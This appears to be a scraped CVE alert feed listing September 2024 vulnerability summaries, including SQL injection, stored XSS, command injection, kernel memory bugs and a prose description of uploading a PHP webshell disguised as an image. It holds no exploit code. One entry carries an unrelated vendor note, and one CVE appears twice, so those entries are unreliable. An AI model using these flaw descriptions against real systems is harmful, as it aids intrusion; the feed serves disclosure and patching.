🚨 CVE-2024-40865The issue was addressed by suspending Persona when the virtual keyboard is active. This issue is fixed in visionOS 1.3. Inputs to the virtual keyboard may be inferred from Persona.🎖@cveNotify |
|
| 2024-09-06 00:37:51 |
🚨 CVE-2024-45400ckeditor-plugin-openlink is a plugin for the CKEditor JavaScript text editor that extends the context menu with a possibility to open a link in a new tab. A vulnerability in versions of the plugin prior to 1.0.7 allowed a user to execute JavaScript code by abusing the link href attribute. The fix is available starting with version 1.0.7.🎖@cveNotify |
|
| 2024-09-05 23:37:32 |
🚨 CVE-2024-0849Leanote version 2.7.0 allows obtaining arbitrary local files. This is possible because the application is vulnerable to LFR.🎖@cveNotify |
|
| 2024-09-05 23:37:26 |
🚨 CVE-2023-22819An uncontrolled resource consumption vulnerability issue that could arise by sending crafted requests to a service to consume a large amount of memory, eventually resulting in the service being stopped and restarted was discovered in Western Digital My Cloud Home, My Cloud Home Duo, SanDisk ibi and Western Digital My Cloud OS 5 devices. This issue requires the attacker to already have root privileges in order to exploit this vulnerability. This issue affects My Cloud Home and My Cloud Home Duo: before 9.5.1-104; ibi: before 9.5.1-104; My Cloud OS 5: before 5.27.161.🎖@cveNotify |
|
| 2024-09-05 23:37:25 |
🚨 CVE-2023-22816A post-authentication remote command injection vulnerability in a CGI file in Western Digital My Cloud OS 5 devices that could allow an attacker to build files with redirects and execute larger payloads.This issue affects My Cloud OS 5 devices: before 5.26.300.🎖@cveNotify |
|
| 2024-09-05 23:37:24 |
🚨 CVE-2023-22815Post-authentication remote command injection vulnerability in Western Digital My Cloud OS 5 devices that could allow an attacker to execute code in the context of the root user on vulnerable CGI files. This vulnerability can only be exploited over the network and the attacker must already have admin/root privileges to carry out the exploit. An authentication bypass is required for this exploit, thereby making it more complex. The attack may not require user interaction. Since an attacker must already be authenticated, the confidentiality impact is low while the integrity and availability impact is high. This issue affects My Cloud OS 5 devices: before 5.26.300.🎖@cveNotify |
|
| 2024-09-05 22:37:32 |
🚨 CVE-2023-4332Broadcom RAID Controller web interface is vulnerable due to Improper permissions on the log file🎖@cveNotify |
|
| 2024-09-05 22:37:25 |
🚨 CVE-2023-4326Broadcom RAID Controller web interface is vulnerable has an insecure default TLS configuration that supports obsolete SHA1-based ciphersuites🎖@cveNotify |
|
| 2024-09-05 22:37:24 |
🚨 CVE-2023-2268Plane version 0.7.1 allows an unauthenticated attacker to view all stored server files of all users.🎖@cveNotify |
|
| 2024-09-05 22:07:32 |
🚨 CVE-2024-7012An authentication bypass vulnerability has been identified in Foreman when deployed with External Authentication, due to the puppet-foreman configuration. This issue arises from Apache's mod_proxy not properly unsetting headers because of restrictions on underscores in HTTP headers, allowing authentication through a malformed header. This flaw impacts all active Satellite deployments (6.13, 6.14 and 6.15) and could potentially enable unauthorized users to gain administrative access.🎖@cveNotify |
|
| 2024-09-05 22:07:26 |
🚨 CVE-2023-7279A vulnerability has been found in Secure Systems Engineering Connaisseur up to 3.3.0 and classified as problematic. This vulnerability affects unknown code of the file connaisseur/res/targets_schema.json of the component Delegation Name Handler. The manipulation leads to inefficient regular expression complexity. The complexity of an attack is rather high. The exploitation appears to be difficult. Upgrading to version 3.3.1 is able to address this issue. The name of the patch is 524b73ff7306707f6d3a4d1e86401479bca91b02. It is recommended to upgrade the affected component.🎖@cveNotify |
|
| 2024-09-05 22:07:25 |
🚨 CVE-2024-38176An improper restriction of excessive authentication attempts in GroupMe allows a unauthenticated attacker to elevate privileges over a network.🎖@cveNotify |
|
| 2024-09-05 22:07:24 |
🚨 CVE-2024-38164An improper access control vulnerability in GroupMe allows an a unauthenticated attacker to elevate privileges over a network by convincing a user to click on a malicious link.🎖@cveNotify |
|
| 2024-09-05 21:37:31 |
🚨 CVE-2024-45063The function ctl_write_buffer incorrectly set a flag which resulted in a kernel Use-After-Free when a command finished processing.Malicious software running in a guest VM that exposes virtio_scsi can exploit the vulnerabilities to achieve code execution on the host in the bhyve userspace process, which typically runs as root. Note that bhyve runs in a Capsicum sandbox, so malicious code is constrained by the capabilities available to the bhyve process. A malicious iSCSI initiator could achieve remote code execution on the iSCSI target host.🎖@cveNotify |
|
| 2024-09-05 21:37:30 |
🚨 CVE-2024-42416The ctl_report_supported_opcodes function did not sufficiently validate a field provided by userspace, allowing an arbitrary write to a limited amount of kernel help memory.Malicious software running in a guest VM that exposes virtio_scsi can exploit the vulnerabilities to achieve code execution on the host in the bhyve userspace process, which typically runs as root. Note that bhyve runs in a Capsicum sandbox, so malicious code is constrained by the capabilities available to the bhyve process. A malicious iSCSI initiator could achieve remote code execution on the iSCSI target host.🎖@cveNotify |
|
| 2024-09-05 21:37:26 |
🚨 CVE-2024-45692Webmin before 2.202 and Virtualmin before 7.20.2 allow a network traffic loop via spoofed UDP packets on port 10000.🎖@cveNotify |
|
| 2024-09-05 21:37:25 |
🚨 CVE-2023-5881Unauthenticated access permitted to web interface page The Genie Company Aladdin Connect (Retrofit-Kit Model ALDCM) "Garage Door Control Module Setup" and modify the Garage door's SSID settings.🎖@cveNotify |
|
| 2024-09-05 21:37:24 |
🚨 CVE-2023-43322ZPE Systems, Inc Nodegrid OS v5.0.0 to v5.0.17, v5.2.0 to v5.2.19, v5.4.0 to v5.4.16, v5.6.0 to v5.6.13, v5.8.0 to v5.8.10, and v5.10.0 to v5.10.3 was discovered to contain a command injection vulnerability via the endpoint /v1/system/toolkit/files/.🎖@cveNotify |
|
| 2024-09-05 21:07:25 |
🚨 CVE-2023-40223Philips Vue PACS does not properly assign, modify, track, or check actor privileges, creating an unintended sphere of control for that actor.🎖@cveNotify |
|
| 2024-09-05 21:07:24 |
🚨 CVE-2023-40159A validated user not explicitly authorized to have access to certain sensitive information could access Philips Vue PACS on the same network to expose that information.🎖@cveNotify |
|
| 2024-09-05 20:37:33 |
🚨 CVE-2022-44569A locally authenticated attacker with low privileges can bypass authentication due to insecure inter-process communication.🎖@cveNotify |
|
| 2024-09-05 20:37:26 |
🚨 CVE-2022-43554Ivanti Avalanche Smart Device Service Missing Authentication Local Privilege Escalation Vulnerability🎖@cveNotify |
|
| 2024-09-05 20:37:25 |
🚨 CVE-2023-45955An issue discovered in Nanoleaf Light strip v3.5.10 allows attackers to cause a denial of service via crafted write binding attribute commands.🎖@cveNotify |
|
| 2024-09-05 20:37:24 |
🚨 CVE-2023-21390In Sim, there is a possible way to evade mobile preference restrictions due to a permission bypass. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation.🎖@cveNotify |
|
| 2024-09-05 20:07:25 |
🚨 CVE-2024-37557Improper Neutralization of Input During Web Page Generation (XSS or 'Cross-site Scripting') vulnerability in Soham Web Solution WP Cookie Law Info allows Stored XSS.This issue affects WP Cookie Law Info: from n/a through 1.1.🎖@cveNotify |
|
| 2024-09-05 20:07:24 |
🚨 CVE-2024-37556Improper Neutralization of Input During Web Page Generation (XSS or 'Cross-site Scripting') vulnerability in SeedProd WordPress Notification Bar allows Stored XSS.This issue affects WordPress Notification Bar: from n/a through 1.3.10.🎖@cveNotify |
|
| 2024-09-05 19:37:37 |
🚨 CVE-2023-40215Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') vulnerability in Demonisblack demon image annotation allows SQL Injection.This issue affects demon image annotation: from n/a through 5.1.🎖@cveNotify |
|
| 2024-09-05 19:37:36 |
🚨 CVE-2023-34179Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') vulnerability in Groundhogg Inc. Groundhogg allows SQL Injection.This issue affects Groundhogg: from n/a through 2.7.11.🎖@cveNotify |
|
| 2024-09-05 19:37:32 |
🚨 CVE-2023-32508Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') vulnerability in Rolf van Gelder Order Your Posts Manually allows SQL Injection.This issue affects Order Your Posts Manually: from n/a through 2.2.5.🎖@cveNotify |
|
| 2024-09-05 19:37:31 |
🚨 CVE-2023-25700Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') vulnerability in Themeum Tutor LMS allows SQL Injection.This issue affects Tutor LMS: from n/a through 2.1.10.🎖@cveNotify |
|
| 2024-09-05 19:37:30 |
🚨 CVE-2022-46818Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') vulnerability in Gopi Ramasamy Email posts to subscribers allows SQL Injection.This issue affects Email posts to subscribers: from n/a through 6.2.🎖@cveNotify |
|
| 2024-09-05 19:37:26 |
🚨 CVE-2022-46859Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') vulnerability in Spiffy Plugins Spiffy Calendar spiffy-calendar allows SQL Injection.This issue affects Spiffy Calendar: from n/a through 4.9.1.🎖@cveNotify |
|
| 2024-09-05 19:37:25 |
🚨 CVE-2023-46361Artifex Software jbig2dec v0.20 was discovered to contain a SEGV vulnerability via jbig2_error at /jbig2dec/jbig2.c.🎖@cveNotify |
|
| 2024-09-05 19:37:24 |
🚨 CVE-2020-24198A persistent cross-site scripting vulnerability in Sourcecodester Stock Management System v1.0 allows remote attackers to inject arbitrary web script or HTML via the 'Brand Name.' NOTE: The vendor states that the RTSP library is used for DEMO only, using it in product is a customer's behavior. Ambarella has emphasized that RTSP is DEMO only library, should NOT be used in product in our document. Because Ambarella's SDK is proprietary, we didn't publish our SDK source code in public network.🎖@cveNotify |
|
| 2024-09-05 19:07:31 |
🚨 CVE-2024-37136Dell Path to PowerProtect, versions 1.1, 1.2, contains an Exposure of Private Personal Information to an Unauthorized Actor vulnerability. A remote high privileged attacker could potentially exploit this vulnerability, leading to information exposure.🎖@cveNotify |
|
| 2024-09-05 19:07:30 |
🚨 CVE-2024-43892In the Linux kernel, the following vulnerability has been resolved:memcg: protect concurrent access to mem_cgroup_idrCommit 73f576c04b94 ("mm: memcontrol: fix cgroup creation failure aftermany small jobs") decoupled the memcg IDs from the CSS ID space to fix thecgroup creation failures. It introduced IDR to maintain the memcg IDspace. The IDR depends on external synchronization mechanisms formodifications. For the mem_cgroup_idr, the idr_alloc() and idr_replace()happen within css callback and thus are protected through cgroup_mutexfrom concurrent modifications. However idr_remove() for mem_cgroup_idrwas not protected against concurrency and can be run concurrently fordifferent memcgs when they hit their refcnt to zero. Fix that.We have been seeing list_lru based kernel crashes at a low frequency inour fleet for a long time. These crashes were in different part oflist_lru code including list_lru_add(), list_lru_del() and reparentingcode. Upon further inspection, it looked like for a given object (dentryand inode), the super_block's list_lru didn't have list_lru_one for thememcg of that object. The initial suspicions were either the object isnot allocated through kmem_cache_alloc_lru() or somehowmemcg_list_lru_alloc() failed to allocate list_lru_one() for a memcg butreturned success. No evidence were found for these cases.Looking more deeply, we started seeing situations where valid memcg's idis not present in mem_cgroup_idr and in some cases multiple valid memcgshave same id and mem_cgroup_idr is pointing to one of them. So, the mostreasonable explanation is that these situations can happen due to racebetween multiple idr_remove() calls or race betweenidr_alloc()/idr_replace() and idr_remove(). These races are causingmultiple memcgs to acquire the same ID and then offlining of one of themwould cleanup list_lrus on the system for all of them. Later access fromother memcgs to the list_lru cause crashes due to missing list_lru_one.🎖@cveNotify |
|
| 2024-09-05 19:07:26 |
🚨 CVE-2024-43890In the Linux kernel, the following vulnerability has been resolved:tracing: Fix overflow in get_free_elt()"tracing_map->next_elt" in get_free_elt() is at risk of overflowing.Once it overflows, new elements can still be inserted into the tracing_mapeven though the maximum number of elements (`max_elts`) has been reached.Continuing to insert elements after the overflow could result in thetracing_map containing "tracing_map->max_size" elements, leaving no emptyentries.If any attempt is made to insert an element into a full tracing_map using`__tracing_map_insert()`, it will cause an infinite loop with preemptiondisabled, leading to a CPU hang problem.Fix this by preventing any further increments to "tracing_map->next_elt"once it reaches "tracing_map->max_elt".🎖@cveNotify |
|
| 2024-09-05 19:07:25 |
🚨 CVE-2024-37551Improper Neutralization of Input During Web Page Generation (XSS or 'Cross-site Scripting') vulnerability in Perials Simple Social Share allows Stored XSS.This issue affects Simple Social Share: from n/a through 3.0.🎖@cveNotify |
|
| 2024-09-05 19:07:24 |
🚨 CVE-2024-37549Improper Neutralization of Input During Web Page Generation (XSS or 'Cross-site Scripting') vulnerability in Pdfcrowd Save as PDF plugin by Pdfcrowd allows Stored XSS.This issue affects Save as PDF plugin by Pdfcrowd: from n/a through 4.0.0.🎖@cveNotify |
|
| 2024-09-05 18:37:32 |
🚨 CVE-2024-43897In the Linux kernel, the following vulnerability has been resolved:net: drop bad gso csum_start and offset in virtio_net_hdrTighten csum_start and csum_offset checks in virtio_net_hdr_to_skbfor GSO packets.The function already checks that a checksum requested withVIRTIO_NET_HDR_F_NEEDS_CSUM is in skb linear. But for GSO packetsthis might not hold for segs after segmentation.Syzkaller demonstrated to reach this warning in skb_checksum_help offset = skb_checksum_start_offset(skb); ret = -EINVAL; if (WARN_ON_ONCE(offset >= skb_headlen(skb)))By injecting a TSO packet:WARNING: CPU: 1 PID: 3539 at net/core/dev.c:3284 skb_checksum_help+0x3d0/0x5b0 ip_do_fragment+0x209/0x1b20 net/ipv4/ip_output.c:774 ip_finish_output_gso net/ipv4/ip_output.c:279 [inline] __ip_finish_output+0x2bd/0x4b0 net/ipv4/ip_output.c:301 iptunnel_xmit+0x50c/0x930 net/ipv4/ip_tunnel_core.c:82 ip_tunnel_xmit+0x2296/0x2c70 net/ipv4/ip_tunnel.c:813 __gre_xmit net/ipv4/ip_gre.c:469 [inline] ipgre_xmit+0x759/0xa60 net/ipv4/ip_gre.c:661 __netdev_start_xmit include/linux/netdevice.h:4850 [inline] netdev_start_xmit include/linux/netdevice.h:4864 [inline] xmit_one net/core/dev.c:3595 [inline] dev_hard_start_xmit+0x261/0x8c0 net/core/dev.c:3611 __dev_queue_xmit+0x1b97/0x3c90 net/core/dev.c:4261 packet_snd net/packet/af_packet.c:3073 [inline]The geometry of the bad input packet at tcp_gso_segment:[ 52.003050][ T8403] skb len=12202 headroom=244 headlen=12093 tailroom=0[ 52.003050][ T8403] mac=(168,24) mac_len=24 net=(192,52) trans=244[ 52.003050][ T8403] shinfo(txflags=0 nr_frags=1 gso(size=1552 type=3 segs=0))[ 52.003050][ T8403] csum(0x60000c7 start=199 offset=1536ip_summed=3 complete_sw=0 valid=0 level=0)Mitigate with stricter input validation.csum_offset: for GSO packets, deduce the correct value from gso_type.This is already done for USO. Extend it to TSO. Let UFO be:udp[46]_ufo_fragment ignores these fields and always computes thechecksum in software.csum_start: finding the real offset requires parsing to the transportheader. Do not add a parser, use existing segmentation parsing. Thanksto SKB_GSO_DODGY, that also catches bad packets that are hw offloaded.Again test both TSO and USO. Do not test UFO for the above reason, anddo not test UDP tunnel offload.GSO packet are almost always CHECKSUM_PARTIAL. USO packets may beCHECKSUM_NONE since commit 10154dbded6d6 ("udp: Allow GSO transmitfrom devices with no checksum offload"), but then still these fieldsare initialized correctly in udp4_hwcsum/udp6_hwcsum_outgoing. So noneed to test for ip_summed == CHECKSUM_PARTIAL first.This revises an existing fix mentioned in the Fixes tag, which brokesmall packets with GSO offload, as detected by kselftests.🎖@cveNotify |
|
| 2024-09-05 18:37:31 |
🚨 CVE-2024-6422An unauthenticated remote attacker can manipulate the device via Telnet, stop processes, read, delete and change data.🎖@cveNotify |
|
| 2024-09-05 18:37:27 |
🚨 CVE-2024-6421An unauthenticated remote attacker can read out sensitive device information through a incorrectly configured FTP service.🎖@cveNotify |
|
| 2024-09-05 18:37:26 |
🚨 CVE-2023-6503The WP Plugin Lister WordPress plugin through 2.1.0 does not have CSRF check in some places, and is missing sanitisation as well as escaping, which could allow attackers to make logged in admin add Stored XSS payloads via a CSRF attack.🎖@cveNotify |
|
| 2024-09-05 18:37:25 |
🚨 CVE-2023-37243The C:\Windows\Temp\Agent.Package.Availability\Agent.Package.Availability.exe file is automatically launched as SYSTEM when the system reboots. Since the C:\Windows\Temp\Agent.Package.Availability folder inherits permissions from C:\Windows\Temp and Agent.Package.Availability.exe is susceptible to DLL hijacking, standard users can write a malicious DLL to it and elevate their privileges.🎖@cveNotify |
|
| 2024-09-05 18:07:26 |
🚨 CVE-2024-42063In the Linux kernel, the following vulnerability has been resolved:bpf: Mark bpf prog stack with kmsan_unposion_memory in interpreter modesyzbot reported uninit memory usages during map_{lookup,delete}_elem.==========BUG: KMSAN: uninit-value in __dev_map_lookup_elem kernel/bpf/devmap.c:441 [inline]BUG: KMSAN: uninit-value in dev_map_lookup_elem+0xf3/0x170 kernel/bpf/devmap.c:796__dev_map_lookup_elem kernel/bpf/devmap.c:441 [inline]dev_map_lookup_elem+0xf3/0x170 kernel/bpf/devmap.c:796____bpf_map_lookup_elem kernel/bpf/helpers.c:42 [inline]bpf_map_lookup_elem+0x5c/0x80 kernel/bpf/helpers.c:38___bpf_prog_run+0x13fe/0xe0f0 kernel/bpf/core.c:1997__bpf_prog_run256+0xb5/0xe0 kernel/bpf/core.c:2237==========The reproducer should be in the interpreter mode.The C reproducer is trying to run the following bpf prog: 0: (18) r0 = 0x0 2: (18) r1 = map[id:49] 4: (b7) r8 = 16777216 5: (7b) *(u64 *)(r10 -8) = r8 6: (bf) r2 = r10 7: (07) r2 += -229 ^^^^^^^^^^ 8: (b7) r3 = 8 9: (b7) r4 = 0 10: (85) call dev_map_lookup_elem#1543472 11: (95) exitIt is due to the "void *key" (r2) passed to the helper. bpf allows uninitstack memory access for bpf prog with the right privileges. This patchuses kmsan_unpoison_memory() to mark the stack as initialized.This should address different syzbot reports on the uninit "void *key"argument during map_{lookup,delete}_elem.🎖@cveNotify |
|
| 2024-09-05 18:07:25 |
🚨 CVE-2024-22441HPE Cray Parallel Application Launch Service (PALS) is subject to an authentication bypass.🎖@cveNotify |
|
| 2024-09-05 17:37:36 |
🚨 CVE-2024-45392SuiteCRM is an open-source customer relationship management (CRM) system. Prior to version 7.14.5 and 8.6.2, insufficient access control checks allow a threat actor to delete records via the API. Versions 7.14.5 and 8.6.2 contain a patch for the issue.🎖@cveNotify |
|
| 2024-09-05 17:37:35 |
🚨 CVE-2024-44728Sourcecodehero Event Management System 1.0 allows Stored Cross-Site Scripting via parameters Full Name, Address, Email, and contact# in /clientdetails/admin/regester.php.🎖@cveNotify |
|
| 2024-09-05 17:37:31 |
🚨 CVE-2024-40645FOG is a cloning/imaging/rescue suite/inventory management system. An improperly restricted file upload feature allows authenticated users to execute arbitrary code on the fogproject server. The Rebranding feature has a check on the client banner image requiring it to be 650 pixels wide and 120 pixels high. Apart from that, there are no checks on things like file extensions. This can be abused by appending a PHP webshell to the end of the image and changing the extension to anything the PHP web server will parse. This vulnerability is fixed in 1.5.10.41.🎖@cveNotify |
|
| 2024-09-05 17:37:30 |
🚨 CVE-2024-7091An issue was discovered in GitLab CE/EE affecting all versions starting from 15.6 prior to 17.0.5, starting from 17.1 prior to 17.1.3, and starting from 17.2 prior to 17.2.1 where it was possible to disclose limited information of an exported group or project to another user.🎖@cveNotify |
|
| 2024-09-05 17:37:26 |
🚨 CVE-2024-5067An issue was discovered in GitLab EE affecting all versions starting from 16.11 prior to 17.0.5, starting from 17.1 prior to 17.1.3, and starting from 17.2 prior to 17.2.1 where certain project-level analytics settings could be leaked in DOM to group members with Developer or higher roles.🎖@cveNotify |
|
| 2024-09-05 17:37:25 |
🚨 CVE-2024-4079An out of bounds read due to a missing bounds check in LabVIEW may disclose information or result in arbitrary code execution. Successful exploitation requires an attacker to provide a user with a specially crafted VI. This vulnerability affects LabVIEW 2024 Q1 and prior versions.🎖@cveNotify |
|
| 2024-09-05 17:37:24 |
🚨 CVE-2024-22442The vulnerability could be remotely exploited to bypass authentication.🎖@cveNotify |
|
| 2024-09-05 17:07:25 |
🚨 CVE-2024-24507Cross Site Scripting vulnerability in Act-On 2023 allows a remote attacker to execute arbitrary code via the newUser parameter in the login.jsp component.🎖@cveNotify |
|
| 2024-09-05 17:07:24 |
🚨 CVE-2023-50782A flaw was found in the python-cryptography package. This issue may allow a remote attacker to decrypt captured messages in TLS servers that use RSA key exchanges, which may lead to exposure of confidential or sensitive data.🎖@cveNotify |
|
| 2024-09-05 16:37:44 |
🚨 CVE-2023-32838In dpe, there is a possible out of bounds write due to a missing valid range checking. This could lead to local escalation of privilege with System execution privileges needed. User interaction is not needed for exploitation. Patch ID: ALPS07310805; Issue ID: ALPS07310805.🎖@cveNotify |
|
| 2024-09-05 16:37:43 |
🚨 CVE-2022-45805Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') vulnerability in Paytm Paytm Payment Gateway paytm-payments allows SQL Injection.This issue affects Paytm Payment Gateway: from n/a through 2.7.3.🎖@cveNotify |
|
| 2024-09-05 16:37:42 |
🚨 CVE-2023-41652Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') vulnerability in David F. Carr RSVPMaker rsvpmaker allows SQL Injection.This issue affects RSVPMaker: from n/a through 10.6.6.🎖@cveNotify |
|
| 2024-09-05 16:37:38 |
🚨 CVE-2023-34383Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') vulnerability in weDevs WP Project Manager wedevs-project-manager allows SQL Injection.This issue affects WP Project Manager: from n/a through 2.6.0.🎖@cveNotify |
|
| 2024-09-05 16:37:37 |
🚨 CVE-2023-39057An information leak in hirochanKAKIwaiting v13.6.1 allows attackers to obtain the channel access token and send crafted messages.🎖@cveNotify |
|
| 2024-09-05 16:37:36 |
🚨 CVE-2023-39053An information leak in Hattoriya v13.6.1 allows attackers to obtain the channel access token and send crafted messages.🎖@cveNotify |
|
| 2024-09-05 16:37:32 |
🚨 CVE-2023-39050An information leak in Daiky-value.Fukueten v13.6.1 allows attackers to obtain the channel access token and send crafted messages.🎖@cveNotify |
|
| 2024-09-05 16:37:31 |
🚨 CVE-2023-39048An information leak in Tokudaya.honten v13.6.1 allows attackers to obtain the channel access token and send crafted messages.🎖@cveNotify |
|
| 2024-09-05 16:37:30 |
🚨 CVE-2023-39042An information leak in Gyouza-newhushimi v13.6.1 allows attackers to obtain the channel access token and send crafted messages.🎖@cveNotify |
|
| 2024-09-05 16:37:26 |
🚨 CVE-2023-38325The cryptography package before 41.0.2 for Python mishandles SSH certificates that have critical options.🎖@cveNotify |
|
| 2024-09-05 16:37:25 |
🚨 CVE-2023-23931cryptography is a package designed to expose cryptographic primitives and recipes to Python developers. In affected versions `Cipher.update_into` would accept Python objects which implement the buffer protocol, but provide only immutable buffers. This would allow immutable objects (such as `bytes`) to be mutated, thus violating fundamental rules of Python and resulting in corrupted output. This now correctly raises an exception. This issue has been present since `update_into` was originally introduced in cryptography 1.8.🎖@cveNotify |
|
| 2024-09-05 16:07:25 |
🚨 CVE-2024-38482CloudLink, versions 7.1.x and 8.x, contain an Improper check or handling of Exceptional Conditions Vulnerability in Cluster Component. A highly privileged malicious user with remote access could potentially exploit this vulnerability, leading to execute unauthorized actions and retrieve sensitive information from the database.🎖@cveNotify |
|
| 2024-09-05 16:07:24 |
🚨 CVE-2024-39917xrdp is an open source RDP server. xrdp versions prior to 0.10.0 have a vulnerability that allows attackers to make an infinite number of login attempts. The number of max login attempts is supposed to be limited by a configuration parameter `MaxLoginRetry` in `/etc/xrdp/sesman.ini`. However, this mechanism was not effectively working. As a result, xrdp allows an infinite number of login attempts.🎖@cveNotify |
|
| 2024-09-05 15:37:31 |
🚨 CVE-2023-32840In modem CCCI, there is a possible out of bounds write due to a missing bounds check. This could lead to local escalation of privilege with System execution privileges needed. User interaction may be also needed for exploitation Patch ID: MOLY01138425; Issue ID: MOLY01138425 (MSV-862).🎖@cveNotify |
|
| 2024-09-05 15:37:30 |
🚨 CVE-2023-41725Ivanti Avalanche EnterpriseServer Service Unrestricted File Upload Local Privilege Escalation Vulnerability🎖@cveNotify |
|
| 2024-09-05 15:37:26 |
🚨 CVE-2023-41259Best Practical Request Tracker (RT) before 4.4.7 and 5.x before 5.0.5 allows Information Disclosure via fake or spoofed RT email headers in an email message or a mail-gateway REST API call.🎖@cveNotify |
|
| 2024-09-05 15:37:25 |
🚨 CVE-2023-34261Kyocera TASKalfa 4053ci printers through 2VG_S000.002.561 allow identification of valid user accounts via username enumeration because they lead to a "nicht einloggen" error rather than a falsch error.🎖@cveNotify |
|
| 2024-09-05 15:37:24 |
🚨 CVE-2013-6040MW6 Aztec, DataMatrix, and MaxiCode ActiveX controls before version 4.0 vulnerable to arbitrary code via a crafted HTML document. Latest versions (4.0) of MW6 Aztec, DataMatrix, and MaxiCode ActiveX controls have resolved the issue🎖@cveNotify |
|
| 2024-09-05 15:08:02 |
🚨 CVE-2024-7076Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') vulnerability in Semtek Informatics Software Consulting Inc. Semtek Sempos allows Blind SQL Injection.This issue affects Semtek Sempos: through 31072024.🎖@cveNotify |
|
| 2024-09-05 15:08:01 |
🚨 CVE-2024-45506HAProxy 2.9.x before 2.9.10, 3.0.x before 3.0.4, and 3.1.x through 3.1-dev6 allows a remote denial of service.🎖@cveNotify |
|
| 2024-09-05 15:07:57 |
🚨 CVE-2024-8407A vulnerability was found in alwindoss akademy up to 35caccea888ed63d5489e211c99edff1f62efdba. It has been declared as problematic. Affected by this vulnerability is an unknown functionality of the file cmd/akademy/handler/handlers.go. The manipulation of the argument emailAddress leads to cross site scripting. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. This product does not use versioning. This is why information about affected and unaffected releases are unavailable.🎖@cveNotify |
|
| 2024-09-05 15:07:56 |
🚨 CVE-2024-42058A null pointer dereference vulnerability in Zyxel ATP series firmware versions from V4.32 through V5.38, USG FLEX series firmware versions from V4.50 through V5.38, USG FLEX 50(W) series firmware versions from V5.20 through V5.38, and USG20(W)-VPN series firmware versions from V5.20 through V5.38 could allow an unauthenticated attacker to cause DoS conditions by sending crafted packets to a vulnerable device.🎖@cveNotify |
|
| 2024-09-05 15:07:52 |
🚨 CVE-2024-21658discourse-calendar is a discourse plugin which adds the ability to create a dynamic calendar in the first post of a topic. The limit on region value length is too generous. This allows a malicious actor to cause a Discourse instance to use excessive bandwidth and disk space. This issue has been patched in main the main branch. There are no workarounds for this vulnerability. Please upgrade as soon as possible.🎖@cveNotify |
|
| 2024-09-05 15:07:51 |
🚨 CVE-2024-43957Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal') vulnerability in Sk. Abul Hasan Animated Number Counters allows PHP Local File Inclusion.This issue affects Animated Number Counters: from n/a through 1.9.🎖@cveNotify |
|
| 2024-09-05 15:07:50 |
🚨 CVE-2024-43943Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') vulnerability in Wpsoul Greenshift Woocommerce Addon allows SQL Injection.This issue affects Greenshift Woocommerce Addon: from n/a before 1.9.8.🎖@cveNotify |
|
| 2024-09-05 14:37:42 |
🚨 CVE-2024-20086In vdec, there is a possible out of bounds write due to a missing bounds check. This could lead to local escalation of privilege with System execution privileges needed. User interaction is not needed for exploitation. Patch ID: ALPS08932916; Issue ID: MSV-1551.🎖@cveNotify |
|
| 2024-09-05 14:37:41 |
🚨 CVE-2024-20084In power, there is a possible out of bounds read due to a missing bounds check. This could lead to local information disclosure with System execution privileges needed. User interaction is not needed for exploitation. Patch ID: ALPS08944210; Issue ID: MSV-1561.🎖@cveNotify |
|
| 2024-09-05 14:37:37 |
🚨 CVE-2024-45522Linen before cd37c3e does not verify that the domain is linen.dev or www.linen.dev when resetting a password. This occurs in create in apps/web/pages/api/forgot-password/index.ts.🎖@cveNotify |
|
| 2024-09-05 14:08:30 |
🚨 CVE-2024-34658Out-of-bounds read in Samsung Notes allows local attackers to bypass ASLR.🎖@cveNotify |
|
| 2024-09-05 14:08:29 |
🚨 CVE-2024-7346Host name validation for TLS certificates is bypassed when the installed OpenEdge default certificates are used to perform the TLS handshake for a networked connection. This has been corrected so that default certificates are no longer capable of overriding host name validation and will need to be replaced where full TLS certificate validation is needed for network security. The existing certificates should be replaced with CA-signed certificates from a recognized certificate authority that contain the necessary information to support host name validation.🎖@cveNotify |
|
| 2024-09-05 14:08:25 |
🚨 CVE-2024-83296SHR system from Gether Technology does not properly validate the specific page parameter, allowing remote attackers with regular privilege to inject SQL command to read, modify, and delete database contents.🎖@cveNotify |
|
| 2024-09-05 14:08:24 |
🚨 CVE-2024-1433A vulnerability, which was classified as problematic, was found in KDE Plasma Workspace up to 5.93.0. This affects the function EventPluginsManager::enabledPlugins of the file components/calendar/eventpluginsmanager.cpp of the component Theme File Handler. The manipulation of the argument pluginId leads to path traversal. It is possible to initiate the attack remotely. The complexity of an attack is rather high. The exploitability is told to be difficult. The patch is named 6cdf42916369ebf4ad5bd876c4dfa0170d7b2f01. It is recommended to apply a patch to fix this issue. The associated identifier of this vulnerability is VDB-253407. NOTE: This requires write access to user's home or the installation of third party global themes.🎖@cveNotify |
|
| 2024-09-05 14:08:23 |
🚨 CVE-2024-21875Allocation of Resources Without Limits or Throttling vulnerability in Badge leading to a denial of service attack.Team Hacker Hotel Badge 2024 on risc-v (billboard modules) allows Flooding.This issue affects Hacker Hotel Badge 2024: from 0.1.0 through 0.1.3.🎖@cveNotify |
|
| 2024-09-05 13:38:45 |
🚨 CVE-2024-42416The ctl_report_supported_opcodes function did not sufficiently validate a field provided by userspace, allowing an arbitrary write to a limited amount of kernel help memory.Malicious software running in a guest VM that exposes virtio_scsi can exploit the vulnerabilities to achieve code execution on the host in the bhyve userspace process, which typically runs as root. Note that bhyve runs in a Capsicum sandbox, so malicious code is constrained by the capabilities available to the bhyve process. A malicious iSCSI initiator could achieve remote code execution on the iSCSI target host.🎖@cveNotify |
|
| 2024-09-05 13:38:44 |
🚨 CVE-2024-32668An insufficient boundary validation in the USB code could lead to an out-of-bounds write on the heap, with data controlled by the caller.A malicious, privileged software running in a guest VM can exploit the vulnerability to achieve code execution on the host in the bhyve userspace process, which typically runs as root. Note that bhyve runs in a Capsicum sandbox, so malicious code is constrained by the capabilities available to the bhyve process.🎖@cveNotify |
|
| 2024-09-05 13:38:40 |
